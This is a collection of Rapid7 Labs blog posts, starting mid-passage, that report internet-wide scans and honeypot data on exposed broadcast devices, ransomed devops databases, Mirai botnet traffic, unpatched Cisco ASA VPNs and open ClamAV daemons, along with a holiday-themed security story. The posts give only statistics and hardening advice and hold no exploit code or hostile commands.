it's likely these devices go untouched for months or even years. It's also trivial to create a script to push a new configuration to all the devices very quickly (we estimated five minutes or less). What is truly alarming is not only are these devices set up to be on the internet without any sort of authentication, but that this issue has been brought up several times in the past. The exposure – which in this case, is really a misconfiguration issue and not strictly a software vulnerability – was identified as early as April 2016, and this specific hijacking technique emerged shortly after the inauguration. Coming Out of a Spot The obvious question is that if this issue was identified nearly a year ago, why are there still systems that are susceptible on the internet? The answer is that just because an issue is identified does not automatically mean that the individuals responsible for securing them are aware that they are vulnerable or of what the impact would be. As much as we as an industry talk about information sharing, often we aren't sharing the right information with the right people. Station owners and operators do not always have a technical or security background, and may not read the security news or blogs. Even when the main stream media published information on the impacted model and version, system operators may not know that they are using that particular model for their broadcast, or they may simply miss the brief media exposure. We cannot and should not assume that people are aware of the issues that are discovered, and therefore we are making a greater effort to inform U.S. station owners by reaching out to them directly in coordination with the National Coordinating Center for Communications (COMM-ISAC) and the National Association of Broadcasters (NAB). We've offered not only to inform these operators that they are vulnerable, but also to help them understand the technical measures that are required to secure their systems, down to walking through how to set a password. What is intuitive to some is not always intuitive to others. Cross Fade Out While hijacking a station to play offensive music is certainly not good, the situation could have been — and still can be — much more serious. There are significant political tensions in the U.S. right now, and a coordinated attack against the nearly 300 devices we identified in this country could cause targeted chaos and panic. Considering how easy it is to access and take control of these devices, a coordinated hijacking of these broadcast streams is not such a far-fetched scenario, so it is imperative to secure these systems to reduce the potential impact of future attacks. You can reach out to research@rapid7.com for more information about the methodology we used to identify and validate the status of these devices.

The Ransomware Chronicles: A DevOps Survival Guide

NOTE: Tom Sellers, Jon Hart, Derek Abdine and (really) the entire Rapid7 Labs team made this post possible. On the internet, no one may know if you're of the canine persuasion, but with a little time and just a few resources they can easily determine…

NOTE: Tom Sellers, Jon Hart, Derek Abdine and (really) the entire Rapid7 Labs team made this post possible. On the internet, no one may know if you're of the canine persuasion, but with a little time and just a few resources they can easily determine whether you're running an open “devops-ish” server or not. We're loosely defining devops-ish as: MongoDB CouchDB Elasticsearch for this post, but we have a much broader definition and more data coming later this year. We use the term “devops” as these technologies tend to be used by individuals or shops that are emulating the development and deployment practices found in the “DevOps” — https://en.wikipedia.org/wiki/DevOps — communities. Why are we focusing on about devops-ish servers? I'm glad you asked! The Rise of Ransomware If you follow IT news, you're likely aware that attackers who are focused on ransomware for revenue generation have taken to the internet searching for easy marks to prey upon. In this case the would-be victims are those running production database servers directly connected to the internet with no authentication. Here's a smattering of news articles on the subject: MongoDB mauled! http://www.zdnet.com/article/mongodb-ransacked-now-27000-databases-hit-in-mass-r ansom-attacks/ Elasticsearch exposed! http://www.pcworld.com/article/3157417/security/after-mongodb-ransomware-groups- hit-exposed-elasticsearch-clusters.html CouchDB crushed! http://www.pcworld.com/article/3159527/security/attackers-start-wiping-data-from -couchdb-and-hadoop-databases.html The core reason why attackers are targeting devops-ish technologies is that most of these servers have a default configurations which have tended to be wide open (i.e. they listen on all IP addresses and have no authentication) to facilitate easy experimentation  exploration. Said configuration means you can give a new technology a test on your local workstation to see if you like the features or API but it also means that — if you're not careful — you'll be exposing real data to the world if you deploy them the same way on the internet. Attackers have been ramping up their scans for these devops-ish services. We've seen this activity in our network of honeypots (Project Heisenberg): We'll be showing probes for more services, including CouchDB, in an upcoming post/report. When attackers find targets, they often take advantage of these open configurations by encrypting the contents of the databases and leaving little “love notes” in the form of table names or index names with instructions on where to deposit bitcoins to get the keys back to your data.  In other cases, the contents of the databases are dumped and kept by the attacker but wiped from the target, then demanding a ransom for the return of the kidnapped data. In other cases, the data is wiped from the target and not kept by the attackers, making anyone who gives in to these demands in for a double-whammy – paying the ransom and not getting any data in return. Not all exposed and/or ransomed services contain real data, but attackers have automated the process of finding and encrypting target systems, so it doesn't matter if they corrupt test databases which will just get deleted as it hasn't cost them any more time or money to do so. And, because the captive systems are still wide open, there have been cases where multiple attacker groups have encrypted systems — at least they fight amongst themselves as well as attack you. Herding Servers on the Wide-Open Range Internet Using Project Sonar — http://sonar.labs.rapid7.com — we surveyed the internet for these three devops databases. NOTE: we have a much larger ongoing study that includes a myriad of devops-ish and “big data” technologies but we're focusing on these three servers for this post given the timeliness of their respective attacks. We try to be good Netizens, so we have more rules in place when it comes to scanning than others do. For example, if you ask us not to scan your internet subnet, we won't. We will also never perform scans requiring credentials/authentication. Finally, we're one of the more profound telemetry gatherers which means many subnets choose to block us. I mention this, first, since many readers will be apt to compare our numbers with the results from their own scans or from other telemetry resources. Scanning the Internet is a messy bit of engineering, science and digital alchemy so there will be differences between various researchers. We found: ~56,000 MongoDB servers ~18,000 Elasticsearch servers ~4,500 CouchDB servers Of those 50% MongoDB servers were captive, 58% of Elasticsearch were captive and 10% of CouchDB servers were captive: A large percentage of each of these devops-ish databases are in “the cloud”: and several of those listed do provide secure deployment guides like this one for MongoDB from Digital Ocean: https://www.digitalocean.com/community/tutorials/how-to-securely-configure-a-pro duction-mongodb-server. However, others have no such guides, or have broken links to such guides and most do not offer base images that are secure by default when it comes to these services. Exposed and Unaware If you do run one of these databases on the internet it would be wise to check your configuration to ensure that you are not exposing them to the internet or at the very least have authentication enabled and rudimentary network security groups configured to limit access. Attackers are continuing to scan for open systems and will continue to encrypt and hold systems for ransom. There's virtually no risk in it for them and it's extremely easy money for them, since the reconnaissance for and subsequent attacking of exposed instances likely often happens from behind anonymization services or from unwitting third party nodes compromised previously. Leaving the configuration open can cause other issues beyond the exposure of the functionality provided by the service(s) in question. Over 100 of the CouchDB servers are exposing some form of PII (going solely by table/db name) and much larger percentages of MongoDB and Elasticsearch open databases seem to have some interesting data available as well. Yes, we can see your table/database names. If we can, so can anyone who makes a connection attempt to your service. We (and attackers) can also see configuration information, meaning we know just how out of date your servers, like MongoDB, are: So, while you're checking how secure your access configurations are, it may also be a good time to ensure that you are up to date on the latest security patches (the story is similarly sad for CouchDB and Elasticsearch). What Can You Do? Use automation (most of you are deploying in the cloud) and within that automation use secure configurations. Each of the three technologies mentioned have security guides that “come with” them: CouchDB: http://docs.couchdb.org/en/2.0.0/intro/security.html Elasticsearch: https://www.elastic.co/blog/found-elasticsearch-security MongoDB: https://docs.mongodb.com/manual/security/ It's also wise to configure your development and testing environments the same way you do production (hey, you're the one who wanted to play with devops-ian technologies so why not go full monty?). You should also configure your monitoring services and vulnerability management program to identify and alert if your internet-facing systems are exposing an insecure configuration. Even the best shops make deployment mistakes on occasion. If you are a victim of a captive server, there is little you can do to recover outside restoring from backups. If you don't have backups, it's up to you do decide just how valuable your data is/was before you consider paying a ransom. If you are a business, also consider reporting the issue to the proper authorities in your locale as part your incident response process. What's Next? We're adding more devops-ish and data science-ish technologies to our Sonar scans and Heisenberg honeypots and putting together a larger report to help provide context on the state of the exposure of these services and to try to give you some advance notice as to when attackers are preying on new server types. If there are database or server technologies you'd like us to include in our more comprehensive study, drop a note in the comments or to research@rapid7.com. Burning sky header image by photophilde used CC-BY-SA

12 Days of HaXmas: A HaxMas Carol

(A Story by Rapid7 Labs) Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the…

(A Story by Rapid7 Labs) Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we're highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them. Happy Holi-data from Rapid7 Labs! It's been a big year for the Rapid7 elves Labs team. Our nigh 200-node strong Heisenberg Cloud honeypot network has enabled us to bring posts & reports such as The Attacker's Dictionary, Cross-Cloud Adversary Analytics and Mirai botnet tracking to the community, while Project Sonar fueled deep dives into National Exposure as well as ClamAV, fuel tanks and tasty, tasty EXTRABACON. Our final gift of the year is the greatest gift of all: DATA! We've sanitized an extract of our November, 2016 cowrie honeypot data from Heisenberg Cloud. While not the complete data set, it should be good for hours of fun over the holiday break. You can e-mail research [at] rapid7 [dot] com if you have any questions or leave a note here in the comments. While you're waiting for that to download, please enjoy our little Haxmas tale… Once upon a Haxmas eve… CISO Scrooge sat sullen in his office. His demeanor was sour as he reviewed the day's news reports and sifted through his inbox, but his study was soon interrupted by a cheery minion's “Merry HaXmas, CISO!”. CISO Scrooge replied, “Bah! Humbug!” The minion was taken aback. “HaXmas a humbug, CISO?! You surely don't mean it!” “I do, indeed…” grumbled Scrooge. “What is there to be merry about? Every day attackers are compromising sites, stealing credentials and bypassing defenses. It's almost impossible to keep up. What's more, the business units and app teams here don't seem to care a bit about security. So, I say it again ‘Merry HaXmas?' - HUMBUG!” Scrooge's minion knew better than argue and quickly fled to the comforting glow of the pew-pew maps in the security operations center. As CISO Scrooge returned to his RSS feeds his office lights dimmed and a message popped up on his laptop, accompanied by a disturbing “clank” noise (very disturbing indeed since he had the volume completely muted). No matter how many times he dismissed the popup it returned, clanking all the louder. He finally relented and read the message: “Scrooge, it is required of every CISO that the defender spirit within them should stand firm with resolve in the face of their adversaries. Your spirit is weary and your minions are discouraged. If this continues, all your security plans will be for naught and attackers will run rampant through your defenses. All will be lost.” Scrooge barely finished uttering, “Hrmph. Nothing but a resourceful security vendor with a crafty marketing message. My ad blocker must be misconfigured and that bulb must have burned out.” “I AM NO MISCONFIGURATION!” appeared in the message stream, followed by, “Today, you will be visited by three cyber-spirits. Expect their arrivals on the top of each hour. This is your only chance to escape your fate.” Then, the popup disappeared and the office lighting returned to normal. Scrooge went back to his briefing and tried to put the whole thing out of his mind. The Ghost of HaXmas Past CISO Scrooge had long finished sifting through news and had moved on to reviewing the first draft of their PCI DSS ROC[i]. His eyes grew heavy as he combed through the tome until he was startled with a bright green light and the appearance of a slender man in a tan plaid 1970's business suit holding an IBM 3270 keyboard. “Are you the cyber-spirit, sir, whose coming was foretold to me?”, asked Scrooge. “I am!”, replied the spirit. “I am the Ghost of Haxmas Past! Come, walk with me!” As Scrooge stood up they were seemingly transported to a room full of mainframe computers with workers staring drone-like into green-screen terminals. “Now, this was security, spirit!” exclaimed Scrooge. “No internet…No modems…Granular RACF[ii] access control…” (Scrooge was beaming almost as bright as the spirit!) “So you had been successful securing your data from attackers?”, asked the spirit. “Well, yes, but this is when we had control! We had the power to give or deny anyone access to critical resources with a mere series of arcane commands.” As soon as he said this, CISO Scrooge noticed the spirit moving away and motioning him to follow. When he caught up, the scene changed to cubicle-lined floor filled with desktop PCs. “What about now, were these systems secure?”, inquired the spirit. “Well, yes. It wasn't as easy as it was with the mainframe, but as our business tools changed and we started interacting with clients and suppliers on the internet we found solutions that helped us protect our systems and networks and give us visibility into the new attacks that were emerging.”, remarked CISO Scrooge. “It wasn't easy. In fact, it was much harder than the mainframe, but the business was thriving: growing, diversifying and moving into new markets. If we had stayed in a mainframe mindset we'd have gone out of business.” The spirit replied, “So, as the business evolved, so did the security challenges, but you had resources to protect your data?” “Well, yes. But, these were just PCs. No laptops or mobile phones. We still had control!”, noted Scrooge. “That may be,” noted the spirit, “but if we continued our journey, would this not be the pattern? Technology and business practices change, but there have always been solutions to security problems coming at the same pace?” CISO Scrooge had to admit that as he looked back in his mind, there had always been ways to identify and mitigate threats as they emerged. They may not have always been 100% successful, but the benefits of the “new” to the business were far more substantial than the possible issues that came with it. The Ghost of Haxmas Present As CISO Scrooge pondered the spirit's words he realized he was back at his desk, his screen having locked due to the required inactivity timeout.  He gruffed a bit (he couldn't understand the 15-minute timeout when at your desk as much as you can't) and fumbled 3 attempts at his overly-complex password to unlock the screen before he was logged back in. His PCI DSS ROC was minimized and his browser was on a MeTube video (despite the site being blocked on the proxy server). He knew he had no choice but to click “play”. As he did, it seemed to be a live video of the Mooncents coffee shop down the street buzzing with activity. He was seamlessly transported from remote viewer to being right in the shop, next to a young woman in bespoke, authentic, urban attire, sipping a double ristretto venti half-soy nonfat decaf organic chocolate brownie iced vanilla double-shot gingerbread frappuccino. Amongst the patrons were people on laptops, tablets and phones, many of them conducting business for CISO's company. “Dude. I am the spirit of Haxmas Present”, she said, softly, as her gaze fixated upon a shadowy figure in the corner. CISO Scrooge turned his own gaze in that direction and noticed a hoodie-clad figure with a sticker-laden laptop. Next to the laptop was a device that looked like a wireless access point and Scrooge could just barely hear the figure chuckling to himself as his fingers danced across the keyboard. “Is that person doing what I think he's doing?”, Scrooge asked the spirit. “Indeed,” she replied. “He's setup a fake Mooncents access point and is intercepting all the comms of everyone connected to it.” Scrooges' eyes got wide as he exclaimed “This is what I mean! These people are just like sheep being led to the shearer. They have no idea what's happening to them! It's too easy for attackers to do whatever they want!” As he paused for a breath, the spirit gestured to a woman who just sat down in the corner and opened her laptop, prompting Scrooge to go look at her screen. The woman did work at CISO's company and she was in Mooncents on her company device, but — much to the surprise of Scrooge — as soon as she entered her credentials, she immediately fired up the VPN Scrooge's team had setup, ensuring that her communications would not be spied upon. The woman never once left her laptop alone and seemed to be very aware of what she needed to do to stay as safe as possible. “Do you see what is happening?”, asked the spirit? “Where and how people work today are not as fixed as it was in the past. You have evolved your corporate defenses to the point that attackers need to go to lengths like this or trick users through phishing to get what they desire.” “Technology I can secure. But how do I secure people?!”, sighed Scrooge. “Did not this woman do what she needed to keep her and your company's data safe?”, asked the spirit. “Well, yes. But it's so much more work!”, noted Scrooge. “I can't install security on users, I have to make them aware of the threats and then make it as easy as possible for them to work securely no matter where they are!”[iii]</sup As soon as he said this, he realized that this was just the next stage in the evolution of the defenses he and his team had been putting into place. The business-growing power inherent in this new mobility and the solid capabilities of his existing defenses forced attackers to behave differently and he understood that he and his team probably needed to as well. The spirit gave a wry, ironic grin at seeing Scrooge's internal revelation. She handed him an infographic titled “Ignorance & Want” that showcased why it was important to make sure employees were well-informed and to also stay in tune with how users want to work and make sure his company's IT offerings were as easy-to-use and functional as all the shiny “cloud” apps. The Ghost of Haxmas Future As Scrooge took hold of the infographic the world around him changed. A dark dystopian scene faded into view. Buildings were in shambles and people were moving in zombie-like fashion in the streets. A third, cloaked spirit appeared next to him and pointed towards a disheveled figure hulking over a fire in a barrel. An “eyes” emoji appeared on the OLED screen where the spirit's face should have been. CISO Scrooge didn't even need to move closer to see that it was a future him struggling to keep warm to survive in this horrible wasteland. “Isn't this a bit much?”, inquired Scrooge. The spirit shrugged and a “whatever” emoji appeared on the screen. Scrooge continued, “I think I've got the message. Business processes will keep evolving and moving faster and will never be tethered and isolated again. I need to stay positive and constantly evolve — relying on psychology, education as well as technology — to address the new methods attackers will be adopting. If I don't, it's ‘game over'.” The spirit's screen flashed a “thumbs up” emoji and CISO Scrooge found himself back at his desk, infographic strangely still in hand with his Haxmas spirt fully renewed. He vowed to keep Haxmas all the year through from now on. [i] Payment Card Industry Data Security Standard Report on Compliance [ii] http://www-03.ibm.com/systems/z/os/zos/features/racf/ [iii] Scrooge eventually also realized he could make use of modern tools such as Insight IDR to combine security & threat event data with user behavior analysis to handle the cases where attackers do successfully breach users.

Election Day: Tracking the Mirai Botnet

by Bob Rudis, Tod Beardsley, Derek Abdine & Rapid7 Labs Team What do I need to know? Over the last several days, the traffic generated by the Mirai family of botnets has changed. We've been tracking the ramp-up and draw-down patterns of Mirai botnet members…

by Bob Rudis, Tod Beardsley, Derek Abdine & Rapid7 Labs Team What do I need to know? Over the last several days, the traffic generated by the Mirai family of botnets has changed. We've been tracking the ramp-up and draw-down patterns of Mirai botnet members and have seen the peaks associated with each reported large scale and micro attack since the DDoS attack against Dyn, Inc. We've tracked over 360,000 unique IPv4 addresses associated with Mirai traffic since October 8, 2016 and have been monitoring another ramp up in activity that started around November 4, 2016: At mid-day on November 8, 2016 the traffic volume was as high as the entire day on November 6, 2016, with all indications pointing to a probable significant increase in botnet node accumulation by the end of the day. We've also been tracking the countries of origin for the Mirai family traffic. Specifically, we've been monitoring the top 10 countries with the most number of Mirai daily nodes. This list has been surprisingly consistent since October 8, 2016. However, on November 6, 2016 the U.S. dropped out of the top 10 originating countries. As we dug into the data, we noticed a significant and sustained drop-off of Mirai nodes from two internet service providers: There are no known impacts from this recent build up, but we are continuing to monitor the Mirai botnet family patterns for any sign of significant change. What is affected? The Mirai botnet was initially associated with various components of the “internet of things”, specifically internet-enabled cameras, DVRs and other devices not generally associated with malicious traffic or malware infections. There are also indications that variants of Mirai may be associated with traditional computing environments, such as Windows PCs. As we've examined the daily Mirai data, a large percentage of connections in each country come from autonomous systems — large block of internet addresses owned by the provider of network services for that block — associated with residential or small-business internet service provider networks. How serious is this? Regardless of the changes we've seen in the Mirai botnet over the last several days, we still do not expect Mirai, or any other online threat, to have an impact on the 2016 United States Presidential Election. The ballot and voting systems in use today are overwhelmingly offline, conducted over approximately 3,000 counties and parishes across the country. Mounting an effective, coordinated, remote attack on these systems is nigh impossible. The most realistic worst-case scenarios we envision for cyber-hijinks this election day are website denial of service attacks, which can impact how people get information about the election. These attacks may (or may not) be executed against voting and election information websites operated by election officials, local and national news organizations, or individual campaigns. If early voting reports are any indication, we expect to see more online interest in this election than the last presidential election, and correspondingly high levels of engagement with election-related websites. Therefore, even if an attack were to occur, it may be difficult for website users to distinguish it from a normal outage due to volume. For more information on election hacking, read this post. How did we find this? We used our collection of Heisenberg Cloud honeypots to capture telnet session data associated with the behaviour of the Mirai botnet family. Heisenberg Cloud consists of 136 honeypot nodes spread across every region/zone of six major cloud providers. The honeypot nodes only track connections and basic behavior in the connections. They are not configured to respond to or decode/interpret Mirai commands. What was the timeline? The overall Mirai tracking period covers October 8, 2016 through today, November 8, 2016. All data and charts provided in this report use an extract of data from October 30, 2016 through November 8, 2016.

Bringing Home The EXTRABACON [Exploit]

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson) Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify…

by Derek Abdine & Bob Rudis (photo CC-BY-SA Kalle Gustafsson) Astute readers will no doubt remember the Shadow Brokers leak of the Equation Group exploit kits and hacking tools back in mid-August. More recently, security researchers at SilentSignal noted that it was possible to modify the EXTRABACON exploit from the initial dump to work on newer Cisco ASA (Adaptive Security Appliance) devices, meaning that virtually all ASA devices (8.x to 9.2(4)) are vulnerable and it may be interesting to dig into the vulnerability a bit more from a different perspective. Now, "vulnerable" is an interesting word to use since: the ASA device must have SNMP enabled and an attacker must have the ability to reach the device via UDP SNMP (yes, SNMP can run over TCP though it's rare to see it working that way) and know the SNMP community string an attacker must also have telnet or SSH access to the devices This generally makes the EXTRABACON attack something that would occur within an organization's network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit. Even though there's a high probable loss magnitude1 from a successful exploit, the threat capability2 and threat event frequency3 for attacks would most likely be low in the vast majority of organizations that use these devices to secure their environments. Having said that, EXTRABACON is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organizations to deploy the patch as soon as they can obtain and test it. Cisco did an admirable job responding to the exploit release and has a patch ready for organizations to deploy. We here at Rapid7 Labs wanted to see if it was possible to both identify externally facing Cisco ASA devices and see how many of those devices were still unpatched. Unfortunately, most firewalls aren't going to have their administrative interfaces hanging off the public internet nor are they likely to have telnet, SSH or SNMP enabled from the internet. So, we set our sights on using Project Sonar to identify ASA devices with SSL/IPsec VPN services enabled since: users generally access corporate VPNs over the internet (so we will be able to see them) many organizations deploy SSL VPNs these days versus or in addition to IPsec (or other) VPNs (and, we capture all SSL sites on the internet via Project Sonar) these SSL VPN-enabled Cisco ASAs are easily identified We found over 50,000 Cisco ASA SSL VPN devices in our most recent SSL scan.Keeping with the spirit of our recent National Exposure research, here's a breakdown of the top 20 countries: Table 1: Device Counts by Country Country Device count % United States 25,644 50.9% Germany 3,115 6.2% United Kingdom 2,597 5.2% Canada 1,994 4.0% Japan 1,774 3.5% Netherlands 1,310 2.6% Sweden 1,095 2.2% Australia 1,083 2.2% Denmark 1,026 2.0% Italy 991 2.0% Russian Federation 834 1.7% France 777 1.5% Switzerland 603 1.2% China 535 1.1% Austria 497 1.0% Norway 448 0.9% Poland 410 0.8% Finland 404 0.8% Czech Republic 396 0.8% Spain 289 0.6% Because these are SSL VPN devices, we also have access to the certificates that organizations used to ensure confidentiality and integrity of the communications. Most organizations have one or two (higher availability) VPN devices deployed, but many must deploy significantly more devices for geographic coverage or capacity needs: Table 2: List of organizations with ten or more VPN ASA devices Organization Count Large Japanese telecom provider 55 Large U.S. multinational technology company 23 Large U.S. health care provider 20 Large Vietnamese financial services company 18 Large Global utilities service provider 18 Large U.K. financial services company 16 Large Canadian university 16 Large Global talent management service provider 15 Large Global consulting company 14 Large French multinational manufacturer 13 Large Brazilian telecom provider 12 Large Swedish technology services company 12 Large U.S. database systems provider 11 Large U.S. health insurance provider 11 Large U.K. government agency 10 So What? The above data is somewhat interesting on its own, but what we really wanted to know is how many of these devices had not been patched yet (meaning that they are technically vulnerable if an attacker is in the right network position). Remember, it's unlikely these organizations have telnet, SSH and SNMP enabled to the internet and researchers in most countries, including those of us here in the United States, are not legally allowed to make credentialed scan attempts on these services without permission. Actually testing for SNMP and telnet/SSH access would have let us identify truly vulnerable systems. After some bantering with the extended team (Brent Cook, Tom Sellers & jhart) and testing against a few known devices, we decided to use hping to determine device uptime from timestamps and see how many devices had been rebooted since release of the original exploits on (roughly) August 15, 2016. We modified our Sonar environment to enable hping studies and then ran the uptime scan across the target device IP list on August 26, 2016, so any system with an uptime > 12 days that has not been rebooted (or is employing some serious timestamp masking techniques) is technically vulnerable. Also remember that organizations who thought their shiny new ASA devices weren't vulnerable also became vulnerable after the August 25, 2016 SilentSignal blog post (meaning that if they thought it was reasonable not to patch and reboot it became unreasonable to think that way on August 25). So, how many of these organizations patched & rebooted? Well, nearly 12,000 (~24%) of them prevented us from capturing the timestamps. Of the remaining ones, here's how their patch status looks: We can look at the distribution of uptime in a different way with a histogram, making 6-day buckets (so we can more easily see "Day 12"): This also shows the weekly patch/reboot cadence that many organizations employ. Let's go back to our organization list and see what the mean last-reboot time is for them: Table 3: hping Scan results (2016-08-26) Organization Count Mean uptime (days) Large Japanese telecom provider 55 33 Large U.S. multinational technology company 23 27 Large U.S. health care provider 20 47 Large Vietnamese financial services company 18 5 Large Global utilities service provider 18 40 Large U.K. financial services company 16 14 Large Canadian university 16 21 Large Global talent management service provider 15 Unavailable Large Global consulting company 14 21 Large French multinational manufacturer 13 34 Large Brazilian telecom provider 12 23 Large Swedish technology services company 12 4 Large U.S. database systems provider 11 25 Large U.S. health insurance provider 11 Unavailable Large U.K. government agency 10 40 Two had no uptime data available and two had rebooted/likely patched since the original exploit release. Fin We ran the uptime scan after the close of the weekend (organizations may have waited until the weekend to patch/reboot after the latest exploit news) and here's how our list looked: Table 4: hping Scan Results (2016-08-29) Organization Count Mean uptime (days) Large Japanese telecom provider 55 38 Large U.S. multinational technology company 23 31 Large U.S. health care provider 20 2 Large Vietnamese financial services company 18 9 Large Global utilities service provider 18 44 Large U.K. financial services company 16 18 Large Canadian university 16 26 Large Global talent management service provider 15 Unavailable Large Global consulting company 14 25 Large French multinational manufacturer 13 38 Large Brazilian telecom provider 12 28 Large Swedish technology services company 12 8 Large U.S. database systems provider 11 26 Large U.S. health insurance provider 11 Unavailable Large U.K. government agency 10 39 Only one additional organization (highlighted) from our "top" list rebooted (likely patched) since the previous scan, but an additional 4,667 devices from the full data set were rebooted (likely patched). This bird's eye view of how organizations have reacted to the initial and updated EXTRABACON exploit releases shows that some appear to have assessed the issue as serious enough to react quickly while others have moved a bit more cautiously. It's important to stress, once again, that attackers need to have far more than external SSL access to exploit these systems. However, also note that the vulnerability is very real and impacts a wide array of Cisco devices beyond these SSL VPNs. So, while you may have assessed this as a low risk, it should not be forgotten and you may want to ensure you have the most up-to-date inventory of what Cisco ASA devices you are using, where they are located and the security configurations on the network segments with access to them. We just looked for a small, externally visible fraction of these devices and found that only 38% of them have likely been patched. We're eager to hear how organizations assessed this vulnerability disclosure in order to make the update/no update decision. So, if you're brave, drop a note in the comments or feel free to send a note to research@rapid7.com (all replies to that e-mail will be kept confidential). 1,2,3 Open FAIR Risk Taxonomy [PDF]

Digging for Clam[AV]s with Project Sonar

A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on…

A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and misconfigured it to be listening on a public interface, you're susceptible to a trivial application denial of service attack and potentially susceptible to a file system enumeration attack since anyone can try virtually every conceivable path combination and see if they get a response. Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run was completed and the following are some of the initial findings. Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post) a great deal of this is "noise". Large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP pot 3310, including nearly: 16,000 squid proxy servers 600 nginx servers (20,000 HTTP servers in all) 500 database servers 600 SSH servers But, you came here to learn about the ClamAV servers, so let's dig in. Clam Hunting We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. This is still an egregious configuration error, however, and if you have this daemon exposed in this same way on your internal network it's a nice target for attackers that make their way past your initial defenses. 5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of the ClamAV versions: You can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forgot" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet. A Banner Haul Now, not all VERSION queries respond with complete banner information but over half did and said response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of the nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes. As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments. As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes: AS AS Name Count % 4766 KIXS-AS-KR Korea Telecom, KR 1,733 29.1% 16276 OVH, FR 513 8.6% 3786 LGDACOM LG DACOM Corporation, KR 316 5.3% 25394 MK-NETZDIENSTE-AS, DE 282 4.7% 35053 PHADE-AS, DE 263 4.4% 11994 CZIO-ASN - Cruzio, US 251 4.2% 41541 SWEB-AS Serveisweb, ES 175 2.9% 9318 HANARO-AS Hanaro Telecom Inc., KR 147 2.5% 23982 SENDB-AS-KR Dongbu District Office of Education in Seoul, KR 104 1.7% 24940 HETZNER-AS, DE 65 1.1% Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger: Country Count % 1 Korea, Republic of 2,463 41.4% 2 Germany 830 14.0% 3 United States 659 11.1% 4 France 512 8.6% 5 Spain 216 3.6% 6 Italy 171 2.9% 7 United Kingdom 99 1.7% 8 Russian Federation 78 1.3% 9 Japan 67 1.1% 10 Brazil 62 1.0% What are some takeaways from these findings? Since there was a partial correlation to exposed ClamAV nodes being hosted in smaller ISPs it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners. While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet. Patching and upgrading go hand-in-hand with configuration management and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet. Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but often times do not heed our own advice. Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers. They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming. Don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally. Fin Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on. Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.

Rapid7's Data Science team, Live! from SOURCE Boston!

Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that Jen Ellis might need prescription lenses) will be speaking at SOURCE Boston this week talking about "doing data science" at "internet scale" and also on how…

